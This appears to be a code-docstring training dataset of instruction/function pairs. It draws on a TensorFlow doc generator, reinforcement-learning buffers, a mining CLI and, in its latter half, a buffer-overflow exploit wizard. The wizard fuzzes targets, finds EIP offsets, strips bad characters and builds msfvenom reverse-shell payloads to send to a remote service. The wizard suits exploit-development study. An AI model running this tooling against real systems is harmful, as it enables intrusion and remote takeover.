+ def __init__(self): + self.decorator_list = [] + def visit_FunctionDef(self, node): + for dec in node.decorator_list: + self.decorator_list.append(_source_from_ast(dec)) + visitor = ASTDecoratorExtractor() + func_ast = get_source.get_ast(func) + if func_ast is not None: + visitor.visit(func_ast) + return visitor.decorator_list +[INST] Recursively enumerate all members of `root`. +Similar to the Python library function `os.path.walk`. + +Traverses the tree of Python objects starting with `root`, depth first. +Parent-child relationships in the tree are defined by membership in modules or +classes. + +If `root` is not a module or class, `visit` is never called. `traverse` +never descends into built-in modules. + + + +Cycles (determined by reference equality, `is`) stop the traversal. A stack of +objects is kept to find cycles. + +Traversing system modules can take a long time, it is advisable to pass a +`visit` callable which denylists such modules.. [/INST] def traverse(root, filters, accumulator, root_name) -> None: + _Traverser(filters, accumulator).traverse(root, [], (root_name,)) +[INST] Returns a list of symbol names imported by the given `obj`.. [/INST] def _get_imported_symbols(obj: Union[str, types.ModuleType]): + class ImportNodeVisitor(ast.NodeVisitor): + def __init__(self): + self.imported_symbols = [] + def _add_imported_symbol(self, node): + for alias in node.names: + name = alias.asname or alias.name + if name == '*': + continue + if '.' in name: + continue + self.imported_symbols.append(name) + def visit_Import(self, node): + self._add_imported_symbol(node) + def visit_ImportFrom(self, node): + self._add_imported_symbol(node) + tree = get_source.get_ast(obj) + if tree is None: + return [] + visitor = ImportNodeVisitor() + visitor.visit(tree) + return visitor.imported_symbols +[INST] Add properties to Proto classes, so they can be documented. +Warning: This inserts the Properties into the class so the rest of the system +is unaffected. This patching is acceptable because there is never a reason to +run other tensorflow code in the same process as the doc generator.. [/INST] def add_proto_fields(path: Sequence[str], parent: Any, + children: Children) -> Children: + del path + if not inspect.isclass(parent) or not issubclass(parent, ProtoMessage): + return children + descriptor = getattr(parent, 'DESCRIPTOR', None) + if descriptor is None: + return children + fields = descriptor.fields + if not fields: + return children + field = fields[0] + field_types = { + getattr(field, name): name + for name in dir(field) + if name.startswith('TYPE') + } + labels = { + getattr(field, name): name + for name in dir(field) + if name.startswith('LABEL') + } + field_properties = {} + for field in fields: + name = field.name + doc_parts = [] + label = labels[field.label].lower().replace('label_', '') + if label != 'optional': + doc_parts.append(label) + type_name = field_types[field.type] + if type_name == 'TYPE_MESSAGE': + type_name = field.message_type.name + elif type_name == 'TYPE_ENUM': + type_name = field.enum_type.name + else: + type_name = type_name.lower().replace('type_', '') + doc_parts.append(type_name) + doc_parts.append(name) + doc = '`{}`'.format(' '.join(doc_parts)) + prop = property(fget=lambda x: x, doc=doc) + field_properties[name] = prop + for name, prop in field_properties.items(): + setattr(parent, name, prop) + children = dict(children) + children.update(field_properties) + children = sorted(children.items(), key=lambda item: item[0]) + return children +[INST] Filters module children to remove builtin modules.. [/INST] def filter_builtin_modules(path: Sequence[str], parent: Any, + children: Children) -> Children: + del path + del parent + filtered_children = [] + for name, child in children: + if inspect.ismodule(child) and child.__name__ in sys.builtin_module_names: + continue + filtered_children.append((name, child)) + return filtered_children +[INST] Converts an ApiTreeNode to a list of toc entries.. [/INST] def _entries_from_api_node( + self, api_node: doc_generator_visitor.ApiTreeNode) -> List[Entry]: + obj_type = api_node.obj_type + if obj_type is obj_type_lib.ObjType.MODULE: + return [self._make_section(api_node)] + if obj_type is obj_type_lib.ObjType.CLASS: + return self._flat_class_entries(api_node) + if obj_type in [ + obj_type_lib.ObjType.CALLABLE, obj_type_lib.ObjType.TYPE_ALIAS + ]: + return [self._make_link(api_node)] + else: + return [] +[INST] Returns the toc.Status of an ApiTreeNode.. [/INST] def _make_status(self, api_node: doc_generator_visitor.ApiTreeNode): + if self._is_deprecated(api_node): + return Status.DEPRECATED + if self._is_experimental(api_node): + return Status.EXPERIMENTAL + return None +[INST] Checks if an object is deprecated or not. +Each deprecated function has a `_tf_decorator.decorator_name` attribute. +Check the docstring of that function to confirm if the function was +indeed deprecated. If a different deprecation setting was used on the +function, then "THIS FUNCTION IS DEPRECATED" substring won't be inserted +into the docstring of that function by the decorator.. [/INST] def _is_deprecated(self, api_node: doc_generator_visitor.ApiTreeNode): + if doc_controls.is_deprecated(api_node.py_object): + return True + decorator_list = signature.extract_decorators(api_node.py_object) + if any('deprecat' in dec for dec in decorator_list): + docstring = getattr(api_node.py_object, '__doc__') or '' + return 'THIS FUNCTION IS DEPRECATED' in docstring + return False +[INST] For top-level modules, place the submodules as peers.. [/INST] def _flat_module_entries(self, + api_node: doc_generator_visitor.ApiTreeNode, + title: Optional[str] = None) -> List[Section]: + title = title or api_node.short_name + overview = self._make_link(api_node, title='Overview') + entries = [] + submodule_sections = [] + for name, child_node in api_node.children.items(): + if child_node.obj_type is obj_type_lib.ObjType.MODULE: + subtitle = f'{title}.{name}' + submodule_sections.append( + self._make_section(child_node, title=subtitle)) + else: + entries.extend(self._entries_from_api_node(child_node)) + entries = sorted(entries, key=self._section_order_key) + entries.insert(0, overview) + submodule_sections = sorted(submodule_sections, key=self._section_order_key) + status = self._make_status(api_node) + module_section = Section(title=title, section=entries, status=status) + return [module_section] + submodule_sections +[INST] Write previously extracted docs to disk. +Write a docs page for each symbol included in the indices of parser_config to +a tree of docs at `output_dir`. + +Symbols with multiple aliases will have only one page written about +them, which is referenced for all aliases.. [/INST] def write_docs( + *, + output_dir: Union[str, pathlib.Path], + parser_config: config.ParserConfig, + yaml_toc: Union[bool, Type[toc_lib.TocBuilder]], + root_module_name: str, + root_title: str = 'TensorFlow', + search_hints: bool = True, + site_path: str = 'api_docs/python', + gen_redirects: bool = True, + gen_report: bool = True, + extra_docs: Optional[Dict[int, str]] = None, + page_builder_classes: Optional[docs_for_object.PageBuilderDict] = None, +): + output_dir = pathlib.Path(output_dir) + site_path = pathlib.Path('/', site_path) + if not output_dir.is_absolute(): + raise ValueError("'output_dir' must be an absolute path.\n" + f" output_dir='{output_dir}'") + output_dir.mkdir(parents=True, exist_ok=True) + redirects = [] + api_report = None + if gen_report: + api_report = utils.ApiReport() + num_docs_output = 0 + for api_node in parser_config.api_tree.iter_nodes(): + full_name = api_node.full_name + if api_node.output_type() is api_node.OutputType.FRAGMENT: + continue + try: + page_info = docs_for_object.docs_for_object( + api_node=api_node, + parser_config=parser_config, + extra_docs=extra_docs, + search_hints=search_hints, + page_builder_classes=page_builder_classes) + if api_report is not None and not full_name.startswith( + ('tf.compat.v', 'tf.keras.backend', 'tf.numpy', + 'tf.experimental.numpy')): + api_report.fill_metrics(page_info) + except Exception as e: + raise ValueError( + f'Failed to generate docs for symbol: `{full_name}`') from e + path = output_dir / parser.documentation_path(full_name) + try: + path.parent.mkdir(exist_ok=True, parents=True) + path.write_text(page_info.page_text, encoding='utf-8') + num_docs_output += 1 + except OSError as e: + raise OSError('Cannot write documentation for ' + f'{full_name} to {path.parent}') from e + duplicates = parser_config.duplicates.get(full_name, []) + if not duplicates: + continue + duplicates = [item for item in duplicates if item != full_name] + if gen_redirects: + for dup in duplicates: + from_path = site_path / dup.replace('.', '/') + to_path = site_path / full_name.replace('.', '/') + redirects.append({'from': str(from_path), 'to': str(to_path)}) + if api_report is not None: + api_report.write(output_dir / root_module_name / 'api_report.pb') + if num_docs_output <= 1: + raise ValueError('The `DocGenerator` failed to generate any docs. Verify ' + 'your arguments (`base_dir` and `callbacks`). ' + 'Everything you want documented should be within ' + '`base_dir`.') + if yaml_toc: + if isinstance(yaml_toc, bool): + yaml_toc = toc_lib.FlatModulesTocBuilder + toc = yaml_toc(site_path).build(parser_config.api_tree) + toc_path = output_dir / root_module_name / '_toc.yaml' + toc.write(toc_path) + if redirects and gen_redirects: + redirects_dict = { + 'redirects': sorted(redirects, key=lambda redirect: redirect['from']) + } + api_redirects_path = output_dir / root_module_name / '_redirects.yaml' + with open(api_redirects_path, 'w') as redirect_file: + yaml.dump(redirects_dict, redirect_file, default_flow_style=False) + with open(output_dir / root_module_name / 'all_symbols.md', 'w') as f: + global_index = parser.generate_global_index( + root_title, parser_config.index, parser_config.reference_resolver) + if not search_hints: + global_index = 'robots: noindex\n' + global_index + f.write(global_index) +[INST] Returns a random sample from the buffer. +Parameters + +batch_size : int +The number of observations to sample.. [/INST] def sample(self, batch_size): + return sample(self.memory, batch_size) +[INST] Adds a transition to the buffer and add an initial prioritization. +Parameters + +args +The state, action, reward, next_state, done tuple. [/INST] def append(self, *args, **kwargs): + idx = self.position + super().append(*args, **kwargs) + self._it_sum[idx] = self._max_priority ** self._alpha + self._it_min[idx] = self._max_priority ** self._alpha +[INST] Sample a batch of experiences. +while returning importance weights and idxes +of sampled experiences. + +Parameters + +int +How many transitions to sample. +beta: float +To what degree to use importance weights +(0 - no corrections, 1 - full correction) + +Returns + +np.array +Array of shape (batch_size,) and dtype np.float32 +denoting importance weight of each sampled transition +idxes: np.array +Array of shape (batch_size,) and dtype np.int32 +idexes in buffer of sampled experiences. [/INST] def sample(self, batch_size, beta): + assert beta > 0 + idxes = self._sample_proportional(batch_size) + weights = [] + p_min = self._it_min.min() / self._it_sum.sum() + max_weight = (p_min * len(self.memory)) ** (-beta) + for idx in idxes: + p_sample = self._it_sum[idx] / self._it_sum.sum() + weight = (p_sample * len(self.memory)) ** (-beta) + weights.append(weight / max_weight) + weights = np.array(weights) + encoded_sample = tuple(zip(*self._encode_sample(idxes))) + batch = list(zip(*encoded_sample, weights, idxes)) + return batch +[INST] Update priorities of sampled transitions. +sets priority of transition at index idxes[i] in buffer +to priorities[i]. + +Parameters + +[int] +List of idxes of sampled transitions +priorities: [float] +List of updated priorities corresponding to +transitions at the sampled idxes denoted by +variable `idxes`.. [/INST] def update_priorities(self, idxes, priorities): + assert len(idxes) == len(priorities) + priorities += np.finfo('float').eps + for idx, priority in zip(idxes, priorities): + if priority < 0: + priority = np.finfo('float').eps + assert 0 <= idx < len(self.memory) + self._it_sum[idx] = priority ** self._alpha + self._it_min[idx] = priority ** self._alpha + self._max_priority = max(self._max_priority, priority) +[INST] Forcing gradients to stay within a certain interval +by setting it to the bound if it goes over it. + +Parameters + +x : number > 0 +Sets the interval to be [-x, x]. [/INST] def clamp_gradients(self, x=1): + assert x > 0 + for param in self.model.parameters(): + param.grad.data.clamp_(-x, x) +[INST] Clears out gradients held in the model.. [/INST] def zero_grad(self): + self.model.zero_grad() +[INST] Run a step of the optimizer on `model`.. [/INST] def step(self): + self.optimizer.step() +[INST] Calculate gradients by shifting parameters +towards the networks with the highest fitness value. + +This is calculated by evaluating the fitness of multiple +networks according to the fitness function specified in +the class.. [/INST] def calc_gradients(self, *args): + white_noise_dict, noise_dict = self._generate_noise_dicts() + candidate_solutions = self._generate_candidate_solutions(noise_dict) + fitness_values = torch.tensor( + [self.fitness(x, *args) for x in candidate_solutions], + device=self.device + ) + if log.enabled: + log.Logger[self.name + "/" + "fitness_value"].append(fitness_values.mean().item()) + fitness_values = (fitness_values - fitness_values.mean()) / (fitness_values.std() + np.finfo('float').eps) + self.zero_grad() + for name, param in self.model.named_parameters(): + if param.requires_grad: + noise_dim_n = len(white_noise_dict[name].shape) + dim = np.repeat(1, noise_dim_n - 1).tolist() if noise_dim_n > 0 else [] + param.grad = (white_noise_dict[name] * fitness_values.float().reshape(self.population_size, *dim)).mean(0) / self.sigma +[INST] Perform a full state sync with the originating model.. [/INST] def sync(self): + self.target_model.load_state_dict(self.model.state_dict()) +[INST] Partially move closer to the parameters of the originating +model by updating parameters to be a mix of the +originating and the clone models. + +Parameters + +tau : number +A number between 0-1 which indicates +the proportion of the originator and clone in the new clone.. [/INST] def partial_sync(self, tau): + assert isinstance(tau, float) + assert 0.0 < tau <= 1.0 + model_state = self.model.state_dict() + target_state = self.target_model.state_dict() + for grad_index, grad in model_state.items(): + target_state[grad_index].copy_((1 - tau) * target_state[grad_index] + tau * grad) + self.target_model.load_state_dict(target_state) +[INST] Adds a log-based probability to the observation.. [/INST] def append_log_probs(self, logprob): + self.log_probs.append(logprob) +[INST] Clears the transitions and log-based probabilities.. [/INST] def clear(self): + self.memory.clear() + self.log_probs.clear() +[INST] Return a list of the transitions with their +associated log-based probabilities.. [/INST] def recall(self): + if len(self.memory) != len(self.log_probs): + raise ValueError("Memory and recorded log probabilities must be the same length.") + return list(zip(*tuple(zip(*self.memory)), self.log_probs)) +[INST] None +Prompt user to set up commands for mining on their machine. [/INST] def mine(): + try: + mining_path = os.path.expanduser('~/.vectordash/mining/mine.sh') + pid_path = os.path.expanduser('~/.vectordash/mining/pid') + if os.path.exists(mining_path): + subprocess.call("chmod +x " + mining_path, shell=True) + process = subprocess.Popen(mining_path) + pid_file = open(pid_path, 'w') + pid_file.write(str(process.pid)) + pid_file.close() + else: + print("Please run " + stylize("vdhost setcommands", fg("blue")) + " before trying to mine.") + except Exception as e: + print(stylize("The following error was thrown: ", fg("red")) + str(e)) + print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?", + fg("red"))) +[INST] None +Prompt user to set up commands for mining on their machine. [/INST] def stop(): + try: + pid_path = os.path.expanduser('~/.vectordash/mining/pid') + if os.path.exists(pid_path): + pid_file = open(pid_path, 'r') + pid = pid_file.read() + pid_file.close() + if int(pid) < 0: + print("Not currently mining. Run " + stylize("vdhost mine", fg("blue")) + " to start mining") + return + subprocess.call("kill -- -$(ps -o pgid= " + pid + " | grep -o [0-9]*)", shell=True) + while pid_exists(pid): + print("Attempting to force kill subprocess") + subprocess.call("kill -9 -p " + pid, shell=True) + pid_file = open(pid_path, 'w') + pid_file.write("-1") + pid_file.close() + else: + print("Please run " + stylize("vdhost mine", fg("blue")) + " before trying to stop mining.") + return + except ValueError as e: + print(stylize("The following error was thrown: ", fg("red")) + str(e)) + print(stylize("Your mining commands could not be executed. Are you sure you are using absolute paths?", + fg("red"))) +[INST] Check whether pid exists in the current process table. +UNIX only.. [/INST] def pid_exists(pid): + try: + print("Double-checking to ensure process was killed") + os.kill(int(pid), 0) + except OSError: + print("pid: " + pid + " killed") + return False + else: + print("pid: " + pid + " still exists") + return True +[INST] Checks if all required binaries are available. [/INST] def check_dependencies(): + dependencies = ['msf-pattern_create', 'msf-pattern_offset', 'msfvenom'] + deps_ok = True + for dep in dependencies: + try: + sub.call(dep, stdout=sub.DEVNULL, stderr=sub.DEVNULL) + except OSError: + deps_ok = False + print_error('Missing binary: {}'.format(dep)) + if not deps_ok: + print_info('You need to install the Metasploit Framework') + return deps_ok +[INST] Prints a welcome message to the screen. [/INST] def print_welcome(): + print('''{} + ╔═╗┬┌┬┐┌─┐┬ ┌─┐ + ╚═╗││││├─┘│ ├┤ + ╚═╝┴┴ ┴┴ ┴─┘└─┘ + ▄▄▄▄ ▒█████ + ▓█████▄ ▒██▒ ██▒ + ▒██▒ ▄██▒██░ ██▒ + ▒██░█▀ ▒██ ██░ + ░▓█ ▀█▓░ ████▓▒░ + ░▒▓███▀▒░ ▒░▒░▒░ + ▒░▒ ░ ░ ▒ ▒░ + ░ ░ ░ ░ ░ ▒ * + ░ ░ ░ *° + *°` + ╦ ╦┬┌─┐┌─┐┬─┐┌┬┐ *°`` + ║║║│┌─┘├─┤├┬┘ ││ (´***°``) + ╚╩╝┴└─┘┴ ┴┴└──┴┘ ```*´´´ + This wizards helps you getting +started with simple buffer overflows. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{} +'''.format(CYAN, FORMAT_END)) +[INST] Prints the buffer overflow types to the screen and stores the users selection. [/INST] def select_bo_type(): + show_prompt_text('Select type of buffer overflow:') + show_prompt_text('[ L ] Local buffer overflow', False) + show_prompt_text(' {} = Open a malicious file in an application {}'.format(GRAY, FORMAT_END), False) + show_prompt_text('[ R ] Remote buffer overflow', False) + show_prompt_text(' {} = Send a malicious request via TCP to an application {}'.format(GRAY, FORMAT_END), False) + user_input = get_input(bo_type_valid) + global bo_type + bo_type = 'local' if user_input in ['l', 'loc', 'local'] else 'remote' +[INST] We will increasing payloads and send them to the application to find out at which length a buffer overflow occurs. [/INST] def step_fuzzing(): + global current_step + current_step = 0 + show_step_banner('[0] Fuzzing') + if bo_type == 'local': + show_prompt_text('Enter file extension:') + user_input = get_input(ext_valid) + global file_ext + global file + file_ext = user_input + file = file_name + '.' + file_ext if file_ext else file_name + print('\n{} files with increasing size will be generated. The following settings will be used:\n'.format( + fuzz_buff_length)) + settings = [desc_file_ext(), desc_fuzz_buff_length(), desc_fuzz_char(), desc_increase_step(), + desc_start_command(), desc_end_command()] + elif bo_type == 'remote': + show_prompt_text('Enter target IP:') + user_input = get_input(ip_valid) + global target + target = user_input + show_prompt_text('Enter target port:') + user_input = get_input(port_valid) + global port + port = int(user_input) + print('\nA fuzzing file will be generated. The following settings will be used:\n') + settings = [desc_target(), desc_port(), desc_fuzz_buff_length(), desc_fuzz_char(), + desc_increase_step(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + if bo_type == 'local': + dump_local_fuzz() + elif bo_type == 'remote': + dump_remote_fuzz() + run_remote_fuzzing() + step_pattern() +[INST] Based on the buffer length determined through fuzzing (previous step), we will create and send +a unique pattern which will help us finding the offset. [/INST] def step_pattern(): + global current_step + current_step = 1 + show_step_banner('[1] Finding offset') + show_prompt_text('Enter the length at which the application/service crashed:') + user_input = get_input(number_valid) + global pattern_length + pattern_length = int(user_input) - len(start_command) - len(end_command) + global buf_length + buf_length = int(user_input) + tmp_file = 'pattern.txt' + command = 'msf-pattern_create -l {} > {}'.format(pattern_length, tmp_file) + thread = call_command(command) + while thread.running(): + animation('Creating pattern') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + pattern = f.read().splitlines()[0].encode() + global buffer + buffer = buffer_list.get_buffer_by_name('pattern').get_buffer(pattern) + os.unlink(tmp_file) + print('The exploit file will be generated. The following settings will be used:\n') + if bo_type == 'local': + settings = [desc_pattern(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + dump_local_exploit() + print(' Load file into vulnerable application and check which pattern is shown in EIP on crash.') + elif bo_type == 'remote': + settings = [desc_target(), desc_port(), desc_pattern(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + dump_remote_exploit() + run_remote_exploit() + step_offsets() +[INST] In the offset step, the user enters the value that overwrites EIP. +By comparing this value to the pattern (previous step), the offset can be determined. +We will then build a custom payload that places Bs in the EIP. +The user must then check in the debugger whether the offset has been calculated properly.. [/INST] def step_offsets(): + global current_step + current_step = 2 + show_step_banner('[2] Checking offsets') + show_prompt_text('Enter the 8 characters that are shown in the EIP:') + user_input = get_input(pattern_valid) + tmp_file = 'offset.txt' + command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file) + thread = call_command(command) + while thread.running(): + animation('Finding offset') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + result = f.read() + try: + global offset + offset = int(result.split(' ')[-1]) + print_info('Offset at ' + str(offset)) + except (ValueError, IndexError): + print_error('Could not find string in pattern. Maybe the exploit did not work?') + print_info('You could return to step [1] and try increasing the length.') + os.unlink(tmp_file) + valid_step = False + while not valid_step: + show_prompt_text('With which step do you want to proceed?') + user_input = get_input(number_valid) + if set_step(user_input): + valid_step = True + os.unlink(tmp_file) + show_prompt_text('Enter the 8 characters that are shown at the top of stack:') + user_input = get_input(pattern_valid) + tmp_file = 'offset.txt' + command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file) + thread = call_command(command) + while thread.running(): + animation('Finding offset') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + result = f.read() + try: + stack_offset = int(result.split(' ')[-1]) + print_info('Offset at ' + str(stack_offset)) + global nop_sled + off_stack_dist = stack_offset - offset + if off_stack_dist > nop_sled: + nop_sled = off_stack_dist + except (ValueError, IndexError): + print_info('Could not find string in pattern. ' + 'Seems that the overflow did not overwrite the stack. We will deal with that later.') + os.unlink(tmp_file) + global buffer + buffer = buffer_list.get_buffer_by_name('generic').get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print( + ' Does the EIP show 42424242? If not, something is wrong with the offset and you should repeat the previous steps.') + print_info('Write the address down where the Cs start. You can use it later to find bad characters with mona.') + if proceed_ok(): + step_badchars() +[INST] In the badchar step an ASCII string is repeatedly passed as payload. +The user has to examine the result in a debugger and enter the characters that break the exploit. +These characters are stored and will be considered later when creating the real payload.. [/INST] def step_badchars(): + global current_step + current_step = 3 + show_step_banner('[3] Finding bad characters') + print_info('You must probably repeat this step multiple times until you have found all bad characters.') + print('''{} + In Immunity Debugger, you can use mona to find the bad characters. To do so, do the following before running the exploit: + 1. Set up working directory: !mona config -set workingfolder c:\\mona\\%p + 2. Create byte array: !mona bytearray + {}'''.format(GRAY, FORMAT_END)) + all_chars_found = False + while not all_chars_found: + global buffer + buffer = buffer_list.get_buffer_by_name('badcharc').get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print('\n Can you see all Cs when following ESP or EAX in dump (depending on where the Cs are stored)?') + print('''{} + In Immunity Debugger, you can use mona to find the bad characters. + To do so, do the following before resending the exploit: + 1. Compare: !mona compare -f c:\\mona\\\\bytearray.bin -a
+ 2. Recreate byte array: !mona bytearray -cpb "{}" + {}'''.format(GRAY, '\\x' + '\\x'.join(c for c in badchars), FORMAT_END)) + show_prompt_text('Enter the character (e.g. 00, 0a, 0d) which does not show up or breaks the exploit') + show_prompt_text('To show all possible ascii characters enter {}show ascii{}'.format(BOLD, FORMAT_END)) + show_prompt_text('Leave empty / press Enter when there a no more bad characters.') + user_input = get_input(bad_char_valid) + if user_input == '': + all_chars_found = True + else: + char = unhexlify(user_input) + global char_string + char_string = char_string.replace(char, b'') + badchars.append(user_input) + step_return() +[INST] By examining the buffer overflow, we can determine where to put the payload and which command to use to access it. [/INST] def step_return(): + global current_step + current_step = 4 + show_step_banner('[4] Finding return address') + show_prompt_text('Examine the buffer overflow in the debugger. Which case does apply?') + buf_types = buffer_list.get_selectable_buffers() + for b in buf_types: + show_prompt_text('[ ' + str(b.id) + ' ] ' + b.select_text, False) + while True: + user_input = int(get_input(number_valid)) + if 0 <= user_input < len(buf_types): + break + print_warning('The number you entered is invalid') + selected = buffer_list.get_buffer_by_id(user_input) + selected.get_input() + global buffer + buffer = selected.get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print(' Check if everything is where it should be. If not, repeat previous steps.') + if proceed_ok(): + step_payload() +[INST] We define the type of payload we wish to send and create the final exploit file.. [/INST] def step_payload(): + global current_step + current_step = 5 + show_step_banner('[5] Creating payload') + global connect_ip + show_prompt_text('Enter your IP (hit Enter to use current value {}):'.format(connect_ip)) + user_input = get_input(ip_valid) + if user_input != '': + connect_ip = user_input + global connect_port + show_prompt_text('Enter the port to listen on (hit Enter to use current value {}):'.format(connect_port)) + user_input = get_input(port_valid) + if user_input != '': + connect_port = user_input + global arch + show_prompt_text('Enter the target architecture (hit Enter to use current value {}):'.format(arch)) + user_input = get_input(arch_valid) + if user_input != '': + arch = 'x' + user_input + global platform + show_prompt_text('Enter the target platform (hit Enter to use current value {}):'.format(platform)) + user_input = get_input(platform_valid) + if user_input != '': + platform = user_input + global payload + while True: + show_prompt_text('Enter payload type'.format(payload)) + show_prompt_text('Show all available with {}show payloads{}'.format(BOLD, FORMAT_END)) + user_input = get_input(payload_valid) + if user_input == 'show payloads': + show_payloads() + continue + else: + payload = user_input + payload_ok = create_payload() + if payload_ok and bo_type == 'local': + dump_local_exploit() + elif payload_ok and bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + show_prompt_text('Did your exploit work? If not, try sending a different payload.') + show_prompt_text( + 'Enter {}again{} to try again. Hit Enter if everything worked fine.'.format(BOLD, FORMAT_END)) + user_input = get_input(check_text) + if user_input == '': + break + else: + continue + get_input(generic_check) +[INST] Creates a palyoad with msfvenom and updates the buffer. [/INST] def create_payload(): + tmp_file = 'payload.py' + payload_size = buffer_list.selected_buffer.payload_size + command = "msfvenom -a {arch} --platform {plat} -p {pay} LHOST={host} LPORT={port} EXITFUNC=thread -s {size} -b '{bad}' -f py -v payld -o {file}".format( + arch=shlex.quote(arch), + plat=shlex.quote(platform), + pay=shlex.quote(payload), + host=connect_ip, + port=connect_port, + size=payload_size, + bad='\\x' + '\\x'.join(str(char) for char in badchars), + file=tmp_file) + print_info("Executing command: " + command) + thread = call_command(command) + while thread.running(): + animation('Creating payload') + if thread.result() == 0: + print() + from payload import payld + global payload_code + payload_code = payld + shutil.rmtree('__pycache__', ignore_errors=True) + global buffer + buffer = buffer_list.selected_buffer.get_buffer() + print_info('Buffer has been updated with new payload') + if len(payload_code) > payload_size: + print_warning( + "The payload was generated as small as possible. However, it is larger than the specified payload size.\n" + "The exploit probably still works fine, but don't be surprised if problems occur.") + return True + else: + print('\n') + print_warning('Something went wrong when creating the payload. Check if you have entered a valid payload.') + print_info('To create a new payload use {}set payload {}'.format(BOLD, FORMAT_END)) + return False +[INST] Accepts certain string variants for local / remote. [/INST] def bo_type_valid(user_input): + if user_input in ['l', 'r', 'loc', 'rem', 'local', 'remote']: + return True + print_error("Invalid buffer overflow type. Only 'local' or 'remote' are possible.") + return False +[INST] Accepts a string with a maximum length of 20 as file extension. [/INST] def ext_valid(user_input): + if user_input.startswith('.') or len(user_input) > 20 or ' ' in user_input: + return False + print_error("Invalid input. Enter the extension without preceding dot. Maximum length is 20.") + return True +[INST] Accepts a string with a valid IP address. [/INST] def ip_valid(user_input): + if user_input == '': + return True + ip_regex = re.compile( + r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$') + return re.match(ip_regex, user_input) +[INST] Accepts an integer within the number range for ports. [/INST] def port_valid(user_input): + if user_input == '': + return True + try: + port_no = int(user_input) + if 0 <= port_no <= 65535: + return True + else: + print_error("Invalid port number.") + return False + except ValueError: + print_error("Invalid port number.") + return False +[INST] The Metasploit pattern is alphanumeric, so the EIP value as well. [/INST] def pattern_valid(user_input): + if len(user_input) == 8 and user_input.isalnum(): + return True + print_error("Invalid pattern. The pattern mus be an 8-bit hex value.") + return False +[INST] Accepts an alphanumeric value of length 2 or no input (= Enter). [/INST] def bad_char_valid(user_input): + if user_input == '': + return True + if len(user_input) == 2 and user_input.isalnum(): + try: + int(user_input, 16) + return True + except ValueError: + return False + print_error("Invalid character. Enter the hex value: 00 0a etc.") + return False +[INST] Accepts a memory location: 8-bit hex value. [/INST] def address_valid(user_input): + if len(user_input) == 8: + try: + int(user_input, 16) + return True + except ValueError: + return False + print_error("Invalid memory address. Must be an 3-bit hex value.") + return False +[INST] Accepts a string matching the basic format 'platform/payload. [/INST] def payload_valid(user_input): + if len(user_input.split('/')) >= 2 or user_input == 'show payloads' or user_input == '': + return True + print_error("Invalid payload. Use 'show payloads' to show valid payloads.") + return False +[INST] Msfvenom platforms are words with a maximum length of 10. [/INST] def platform_valid(user_input): + if (len(user_input) <= 10 and user_input.isalpha()) or user_input == '': + return True + print_error("Invalid platform type") + return False +[INST] Accepts any string without numbers or special characters. [/INST] def check_text(user_input): + if user_input.isalpha() or user_input == '': + return True + print_error("Invalid input") + return False +[INST] Requires the user to hit enter to proceed. [/INST] def proceed_ok(): + show_prompt_text('Press Enter to proceed.') + if get_input(check_enter) == '': + return True + return False +[INST] Prints the currently set values of all parameters. [/INST] def show_options(): + dash = '-' * 77 + header = ['Name', 'Current setting', 'Required', 'Description'] + options = [ + [ + ['Global parameters'], + desc_bo_type(), + desc_start_command(), + desc_end_command() + ], + [ + ['Local buffer overflow parameters'], + desc_file_name(), + desc_file_ext() + ], + [ + ['Remote buffer overflow parameters'], + desc_target(), + desc_port() + ], + [ + ['Fuzzing'], + desc_fuzz_buff_length(), + desc_increase_step(), + desc_fuzz_char() + ], + [ + ['Buffer'], + desc_pattern(), + desc_buf_length(), + desc_offset(), + desc_badchars(), + desc_nop_sled(), + desc_nop_padding(), + desc_return_address() + ], + [ + ['Payload'], + desc_payload(), + desc_arch(), + desc_platform(), + desc_connect_ip(), + desc_connect_port() + ] + ] + print(BOLD, GRAY) + print('{:<15s}{:<20}{:<15s}{:<30s}'.format(header[0], header[1], header[2], header[3])) + print(dash, FORMAT_END) + for item in options: + for index, value in enumerate(item): + if index == 0: + print(BOLD, GRAY) + print(value[0].upper(), FORMAT_END) + else: + print('{:<15s}{:<20}{:<15s}{:<30s}'.format(value[0], value[1], value[2], value[3])) + print('\n') +[INST] Shows parameters and their currently set values. [/INST] def show_settings(settings): + header = ['Parameter', 'Current setting', 'Description'] + print('{}{}{:<15s}{:<20}{:<30s}{}'.format(BOLD, GRAY, header[0], header[1], header[2], FORMAT_END)) + for item in settings: + print('{}{:<15s}{:<20}{:<30s}{}'.format(GRAY, item[0], item[1], item[3], FORMAT_END)) + print('\nIf you wish to change these settings, enter {}set {}\n'.format(BOLD, FORMAT_END)) +[INST] Displays all steps of the wizard and marks the currently selected step. [/INST] def show_steps(): + print('\nThe wizard guides you through the following steps:') + steps = ['Fuzzing', + 'Send pattern to find offset for EIP', + 'Check offsets', + 'Check bad characters', + 'Check return address', + 'Create payload'] + for index, value in enumerate(steps): + if index == current_step: + print('{}=>[{}] {} {}'.format(CYAN, index, value, FORMAT_END)) + else: + print('{} [{}] {} {}'.format(GRAY, index, value, FORMAT_END)) + print('The prompt shows your current step.') + print('You can switch between steps at any time with {}set step {}\n'.format(BOLD, FORMAT_END)) +[INST] Shows all payloads available in Metasploit based on the current values for architecture and platform. [/INST] def show_payloads(): + tmp_file = 'payloads.txt' + command = 'msfvenom -l payloads > {}'.format(tmp_file) + thread = call_command(command) + while thread.running(): + animation('Searching payloads in msfvenom') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + for line in f: + splitted = 